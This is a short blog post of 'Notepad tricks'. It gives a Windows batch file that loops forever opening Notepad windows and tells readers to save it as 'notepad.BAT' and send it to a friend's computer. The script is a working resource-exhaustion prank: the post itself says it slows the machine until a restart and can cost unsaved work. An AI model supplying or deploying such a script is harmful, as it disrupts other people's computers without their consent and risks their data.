To Open Notepad continuously in your friend’s computer:
Type the code in notepad as :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.
This entry was posted on Dec 6, 2010 at 10:08 AM and is filed under Notepad_tricks. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response.

